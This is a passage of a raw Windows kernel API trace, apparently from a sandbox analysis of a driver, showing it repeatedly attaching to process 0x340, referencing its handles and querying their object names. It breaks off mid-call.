(in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.923] ObReferenceObjectByHandle (in: Handle=0x378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f5d10, HandleInformation=0x0) returned 0x0 [0264.923] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.923] PsReleaseProcessExitSynchronization () returned 0x2 [0264.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40041 [0264.923] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.923] ObfDereferenceObject (Object=0xffffe000698f5d10) returned 0x7fcf [0264.923] IoCompleteRequest () returned 0x0 [0264.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.923] PsAcquireProcessExitSynchronization () returned 0x0 [0264.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.924] ObReferenceObjectByHandle (in: Handle=0x39c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148760f00, HandleInformation=0x0) returned 0x0 [0264.924] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.924] PsReleaseProcessExitSynchronization () returned 0x2 [0264.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40040 [0264.924] ObQueryNameString (in: Object=0xffffc00148760f00, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.924] ObfDereferenceObject (Object=0xffffc00148760f00) returned 0x7ffe [0264.924] IoCompleteRequest () returned 0x0 [0264.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.924] PsAcquireProcessExitSynchronization () returned 0x0 [0264.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.924] ObReferenceObjectByHandle (in: Handle=0x3d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698faa50, HandleInformation=0x0) returned 0x0 [0264.924] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.924] PsReleaseProcessExitSynchronization () returned 0x2 [0264.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003f [0264.924] ObQueryNameString (in: Object=0xffffe000698faa50, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.924] ObfDereferenceObject (Object=0xffffe000698faa50) returned 0x7fff [0264.924] IoCompleteRequest () returned 0x0 [0264.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.924] PsAcquireProcessExitSynchronization () returned 0x0 [0264.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.924] ObReferenceObjectByHandle (in: Handle=0x4b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006990fe60, HandleInformation=0x0) returned 0x0 [0264.924] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.924] PsReleaseProcessExitSynchronization () returned 0x2 [0264.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003e [0264.924] ObQueryNameString (in: Object=0xffffe0006990fe60, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.924] ObfDereferenceObject (Object=0xffffe0006990fe60) returned 0x7dff [0264.924] IoCompleteRequest () returned 0x0 [0264.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.924] PsAcquireProcessExitSynchronization () returned 0x0 [0264.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.924] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006990f4c0, HandleInformation=0x0) returned 0x0 [0264.924] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.924] PsReleaseProcessExitSynchronization () returned 0x2 [0264.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003d [0264.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.924] ObfDereferenceObject (Object=0xffffe0006990f4c0) returned 0x800d [0264.924] IoCompleteRequest () returned 0x0 [0264.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.924] PsAcquireProcessExitSynchronization () returned 0x0 [0264.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.924] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069913e70, HandleInformation=0x0) returned 0x0 [0264.924] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.924] PsReleaseProcessExitSynchronization () returned 0x2 [0264.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003c [0264.925] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.925] ObfDereferenceObject (Object=0xffffe00069913e70) returned 0x800d [0264.925] IoCompleteRequest () returned 0x0 [0264.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.925] PsAcquireProcessExitSynchronization () returned 0x0 [0264.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.925] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006930a640, HandleInformation=0x0) returned 0x0 [0264.925] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.925] PsReleaseProcessExitSynchronization () returned 0x2 [0264.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003b [0264.925] ObQueryNameString (in: Object=0xffffe0006930a640, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.925] ObfDereferenceObject (Object=0xffffe0006930a640) returned 0x7fff [0264.925] IoCompleteRequest () returned 0x0 [0264.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.925] PsAcquireProcessExitSynchronization () returned 0x0 [0264.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.925] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699156c0, HandleInformation=0x0) returned 0x0 [0264.925] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.925] PsReleaseProcessExitSynchronization () returned 0x2 [0264.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4003a [0264.925] ObQueryNameString (in: Object=0xffffe000699156c0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.925] ObfDereferenceObject (Object=0xffffe000699156c0) returned 0x7ffd [0264.925] IoCompleteRequest () returned 0x0 [0264.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.925] PsAcquireProcessExitSynchronization () returned 0x0 [0264.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.925] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699152c0, HandleInformation=0x0) returned 0x0 [0264.925] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.925] PsReleaseProcessExitSynchronization () returned 0x2 [0264.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40039 [0264.925] ObQueryNameString (in: Object=0xffffe000699152c0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.925] ObfDereferenceObject (Object=0xffffe000699152c0) returned 0x7fe9 [0264.925] IoCompleteRequest () returned 0x0 [0264.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.925] PsAcquireProcessExitSynchronization () returned 0x0 [0264.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.925] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699beda0, HandleInformation=0x0) returned 0x0 [0264.925] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.925] PsReleaseProcessExitSynchronization () returned 0x2 [0264.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40038 [0264.925] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.925] ObfDereferenceObject (Object=0xffffe000699beda0) returned 0x800c [0264.925] IoCompleteRequest () returned 0x0 [0264.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.926] PsAcquireProcessExitSynchronization () returned 0x0 [0264.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.926] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699c3310, HandleInformation=0x0) returned 0x0 [0264.926] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.926] PsReleaseProcessExitSynchronization () returned 0x2 [0264.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40037 [0264.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.926] ObfDereferenceObject (Object=0xffffe000699c3310) returned 0x8007 [0264.926] IoCompleteRequest () returned 0x0 [0264.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.926] PsAcquireProcessExitSynchronization () returned 0x0 [0264.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.926] ObReferenceObjectByHandle (in: Handle=0x688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699c7dc0, HandleInformation=0x0) returned 0x0 [0264.926] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.926] PsReleaseProcessExitSynchronization () returned 0x2 [0264.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40036 [0264.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.926] ObfDereferenceObject (Object=0xffffe000699c7dc0) returned 0x800c [0264.926] IoCompleteRequest () returned 0x0 [0264.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.926] PsAcquireProcessExitSynchronization () returned 0x0 [0264.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.926] ObReferenceObjectByHandle (in: Handle=0x690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699c9900, HandleInformation=0x0) returned 0x0 [0264.926] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.926] PsReleaseProcessExitSynchronization () returned 0x2 [0264.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40035 [0264.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.926] ObfDereferenceObject (Object=0xffffe000699c9900) returned 0x800d [0264.926] IoCompleteRequest () returned 0x0 [0264.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.926] PsAcquireProcessExitSynchronization () returned 0x0 [0264.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.926] ObReferenceObjectByHandle (in: Handle=0x694, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699c93d0, HandleInformation=0x0) returned 0x0 [0264.926] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.926] PsReleaseProcessExitSynchronization () returned 0x2 [0264.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40034 [0264.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.926] ObfDereferenceObject (Object=0xffffe000699c93d0) returned 0x800f [0264.926] IoCompleteRequest () returned 0x0 [0264.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.926] PsAcquireProcessExitSynchronization () returned 0x0 [0264.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.926] ObReferenceObjectByHandle (in: Handle=0x698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007ff97f20, HandleInformation=0x0) returned 0x0 [0264.926] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.927] PsReleaseProcessExitSynchronization () returned 0x2 [0264.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40033 [0264.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.927] ObfDereferenceObject (Object=0xffffe0007ff97f20) returned 0x7fff [0264.927] IoCompleteRequest () returned 0x0 [0264.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.927] PsAcquireProcessExitSynchronization () returned 0x0 [0264.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.927] ObReferenceObjectByHandle (in: Handle=0x69c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699cadc0, HandleInformation=0x0) returned 0x0 [0264.927] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.927] PsReleaseProcessExitSynchronization () returned 0x2 [0264.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40032 [0264.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.927] ObfDereferenceObject (Object=0xffffe000699cadc0) returned 0x800f [0264.927] IoCompleteRequest () returned 0x0 [0264.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.927] PsAcquireProcessExitSynchronization () returned 0x0 [0264.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.927] ObReferenceObjectByHandle (in: Handle=0x6a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007fdfc4a0, HandleInformation=0x0) returned 0x0 [0264.927] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.927] PsReleaseProcessExitSynchronization () returned 0x2 [0264.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40031 [0264.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.927] ObfDereferenceObject (Object=0xffffe0007fdfc4a0) returned 0x8005 [0264.927] IoCompleteRequest () returned 0x0 [0264.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.927] PsAcquireProcessExitSynchronization () returned 0x0 [0264.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.927] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007ff97090, HandleInformation=0x0) returned 0x0 [0264.927] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.927] PsReleaseProcessExitSynchronization () returned 0x2 [0264.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40030 [0264.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.927] ObfDereferenceObject (Object=0xffffe0007ff97090) returned 0x800f [0264.927] IoCompleteRequest () returned 0x0 [0264.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.927] PsAcquireProcessExitSynchronization () returned 0x0 [0264.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.927] ObReferenceObjectByHandle (in: Handle=0x6a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699cb090, HandleInformation=0x0) returned 0x0 [0264.927] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.927] PsReleaseProcessExitSynchronization () returned 0x2 [0264.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002f [0264.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.928] ObfDereferenceObject (Object=0xffffe000699cb090) returned 0x800f [0264.928] IoCompleteRequest () returned 0x0 [0264.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.928] PsAcquireProcessExitSynchronization () returned 0x0 [0264.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.928] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bdd090, HandleInformation=0x0) returned 0x0 [0264.928] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.928] PsReleaseProcessExitSynchronization () returned 0x2 [0264.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002e [0264.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.928] ObfDereferenceObject (Object=0xffffe00069bdd090) returned 0x800f [0264.928] IoCompleteRequest () returned 0x0 [0264.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.928] PsAcquireProcessExitSynchronization () returned 0x0 [0264.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.928] ObReferenceObjectByHandle (in: Handle=0x6b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fcd760, HandleInformation=0x0) returned 0x0 [0264.928] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.928] PsReleaseProcessExitSynchronization () returned 0x2 [0264.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002d [0264.928] ObQueryNameString (in: Object=0xffffe00069fcd760, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.928] ObfDereferenceObject (Object=0xffffe00069fcd760) returned 0x8000 [0264.928] IoCompleteRequest () returned 0x0 [0264.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.928] PsAcquireProcessExitSynchronization () returned 0x0 [0264.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.928] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b73090, HandleInformation=0x0) returned 0x0 [0264.928] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.928] PsReleaseProcessExitSynchronization () returned 0x2 [0264.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002c [0264.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.928] ObfDereferenceObject (Object=0xffffe00069b73090) returned 0x8009 [0264.928] IoCompleteRequest () returned 0x0 [0264.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.928] PsAcquireProcessExitSynchronization () returned 0x0 [0264.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.928] ObReferenceObjectByHandle (in: Handle=0x6e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069917f20, HandleInformation=0x0) returned 0x0 [0264.928] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.928] PsReleaseProcessExitSynchronization () returned 0x2 [0264.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002b [0264.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.928] ObfDereferenceObject (Object=0xffffe00069917f20) returned 0x8008 [0264.928] IoCompleteRequest () returned 0x0 [0264.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.929] PsAcquireProcessExitSynchronization () returned 0x0 [0264.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.929] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069916d10, HandleInformation=0x0) returned 0x0 [0264.929] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.929] PsReleaseProcessExitSynchronization () returned 0x2 [0264.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4002a [0264.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, 